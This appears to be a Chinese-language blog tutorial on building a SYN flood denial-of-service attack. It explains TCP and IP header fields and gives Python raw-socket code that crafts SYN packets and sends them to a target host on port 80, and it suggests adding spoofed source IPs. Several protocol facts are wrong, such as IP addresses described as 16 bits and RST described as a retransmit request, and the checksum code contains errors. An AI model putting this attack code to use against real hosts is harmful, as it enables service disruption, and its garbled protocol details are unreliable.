设计原理 SYN-Flood是目前最流行的DDoS攻击手段,DDoS只是洪水攻击的一个种类。其实还有其它种类的洪水攻击。
TCP报文格式 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0---------------8---------------16----------------24---------------31 (bit)
|-------------------------------------------------------------------|
| Source Port | Destination Port |
|-------------------------------------------------------------------|
| Sequence Number |
|-------------------------------------------------------------------|
| Acknowledgment Number |
|-------------------------------------------------------------------|
|Offset | Reserved ||U|A|P|R|S|F| Window |
|-------------------------------------------------------------------|
| Checksum | Urgent Pointer |
|-------------------------------------------------------------------|
| [Options] | Padding |
|-------------------------------------------------------------------|
| Data |
|-------------------------------------------------------------------|
源端口(Source Port):16比特,标识主机上发起的应用程序。
URG(Urgent data):紧急指针(urgent pointer)有效。如果URG为1,表示这是一个携有紧急资料的封包。
ACK(Acknowledgment field significant):确认序号有效。如果ACK为1,表示此封包属于一个要回应的封包。一般都会为1。
PSH(Push function):接收方应该尽快将这个报文段交给应用层。如果PSH为1,此封包所携带的数据会直接上传给上层应用程序而无需经过TCP处理。
RST(Reset):重建连接。如果RST为1,要求重传。表示要求重新设定封包再重新传递。
SYN(Synchronize sequence number):发起一个连接。如果SYN为1,表示要求双方进行同步沟通。
FIN(Finish-No more data for sender):释放一个连接。如果FIN为1,表示传送结束,然後双方发出结束回应进而正式终止一个TCP传送过程。
IP报文格式 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0---------------8---------------16----------------24---------------31 (bit)
|-------------------------------------------------------------------|
|Version|HeaderL|Type of Service| Total Lengh |
|-------------------------------------------------------------------|
| Identification | Flag | Fragment Offset |
|-------------------------------------------------------------------|
| Time to Live | Protocol | Header Checksum |
|-------------------------------------------------------------------|
| Source IP Address |
|-------------------------------------------------------------------|
| Destination IP Address |
|---------------------------------------- --------------------------|
| [Options] |
|-------------------------------------------------------------------|
| Data |
|-------------------------------------------------------------------|
版本号(Version):4比特,表示目前采用的IP协议版本号,IPv4(0100)、IPv6(0110),在这个SYN Flood实例中,我们使用IPv4(0100)。
IP报文头部长度(Header Length):4比特,单位为32bit(4字节),因为IP头后有可选部分,因此对于标准的IP报头,头部长度为20字节,该字段值因为5(0101)。且头部最长为15*4=60字节(1111)。
服务类型(Type of Service):8比特。
IP报文总长度(Total Length):16比特,以字节为单位计算的IP包的长度(包括头部和数据),IP报文最大长度为65535字节。
标识符(Identification):16比特,与Flag和Fragment Offset结合使用,对上层数据包进行分段操作。
标记(Flag):3比特,标记此报文是否还有后续报文(数据分段)。
分段序号(Fragment Offset):13比特,该字段对包含分段的上层数据包的IP包赋予序号。
生存时间(Time to Live):8比特,IP包进行传送时,先会对该字段赋予某个特定的值。当IP包经过每一个沿途的路由器的时候,每个沿途的路由器会将IP包的TTL值减少1。如果TTL减少为0,则该IP包会被丢弃。这个字段可以防止由于故障而导致IP包在网络中不停被转发。
协议(Protocol):8比特,标识上层所使用的协议。
头部校验(Header Checksum):16比特,由于IP包头是变长的,所以提供一个头部校验来保证IP包头中信息的正确性。
源IP地址(Source IP Address):16比特,标识该报文的源IP地址。
目的IP地址(Destination IP Address):16比特,标识该报文的目的IP地址。
可选项(Options):这是一个可变长的字段,长度为0或32bit的整倍数,最大320bit,如果不足则填充到满。
数据(Data):该IP报文所携带的数据信息。
设计步骤 TCP建立连接有3次握手,而SYN Flood利用就是这个握手的过程,针对一个开放的服务端口,发送大量的SYN连接请求,致使目标堆积大量的半连接而导致资源耗尽最终达到Dos的效果。1
sockfd = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
建立一个原始套接口,由于我们的IP源地址是伪造的,所以得在setsockopt中设置IP_HDRINCL告诉系统自己填充IP首部并自己计算校验和。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def checksum (source_string) :
rsum = 0
countTo = (len(source_string)) / 2
count = 0
while count < countTo:
thisVal = ord(source_string[count + 1 ])*256 + ord(source_string[count])
rsum = rsum + thisVal
rsum = rsum & 0xffffffff
count += 2
if countTo < len(source_string):
rsum = rsum + ord(source_string[len(source_string) - 1 ])
rsum = rsum & 0xfffffff
rsum = (rsum >> 16 ) + (rsum & 0xffff )
rsum = rsum + (rsum >> 16 )
answer = ~rsum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00 )
return answer
源码 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import sys
import socket
import struct
def checksum (source_string) :
rsum = 0
countTo = (len(source_string)) / 2
count = 0
while count < countTo:
thisVal = ord(source_string[count + 1 ])*256 + ord(source_string[count])
rsum = rsum + thisVal
rsum = rsum & 0xffffffff
count += 2
if countTo < len(source_string):
rsum = rsum + ord(source_string[len(source_string) - 1 ])
rsum = rsum & 0xfffffff
rsum = (rsum >> 16 ) + (rsum & 0xffff )
rsum = rsum + (rsum >> 16 )
answer = ~rsum
answer = answer & 0xffff
answer = answer >> 8 | (answer << 8 & 0xff00 )
return answer
sockfd = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
src_port = 114
dst_port = 80
seq_number = 1000
ack_number = 0
data_offset = 5
reversed_flag = 0
urg_flag = 0
ack_flag = 0
psh_flag = 0
rst_flag = 0
syn_flag = 1
fin_flag = 0
tcp_flags = fin_flag + (syn_flag << 1 ) + (rst_flag << 2 ) + (psh_flag << 3 ) + (ack_flag << 4 ) + (urg_flag << 5 )
window_size = 65535
header_checksum = 0
urg_pointer = 0
tcp_header = struct.pack('!HHIIBBHHH' , src_port, dst_port, seq_number, ack_number, data_offset << 4 , tcp_flags, window_size, header_checksum, urg_pointer)
header_checksum = checksum(tcp_header)
tcp_header = struct.pack('!HHIIBBHHH' , src_port, dst_port, seq_number, ack_number, data_offset << 4 , tcp_flags, window_size, header_checksum, urg_pointer)
dst_ip = socket.gethostbyname(sys.argv[1 ])
sockfd.sendto(tcp_header, (dst_ip, 0 ))
结语 本文从说明SYN洪泛攻击的主要原理开始,对TCP和IP报文头部进行了简要的介绍,因为SYN主要是基于TCP的三次握手,而构造IP报文头部可以实现多伪IP地址欺骗。在第二部分内容中主要是讲到如何利用Python的raw socket对TCP报文头的构造,其中的重点内容是校验和函数的编写,与为了保证TCP校验的有效性,增加一个TCP尾部的校验和。但不足的地方在于没有对IP地址进行混淆,没有实现IP报文头的构造,但是根据Python API和IP报文头的结构不难构造出IP报文头。
参考资料 1.剖析SYN Flooding攻击 作者:百度文库 Python SYN Flood实践 作者:rickgray Syn flood program in python using raw sockets (Linux) SYN Flooding with Scapy and Python
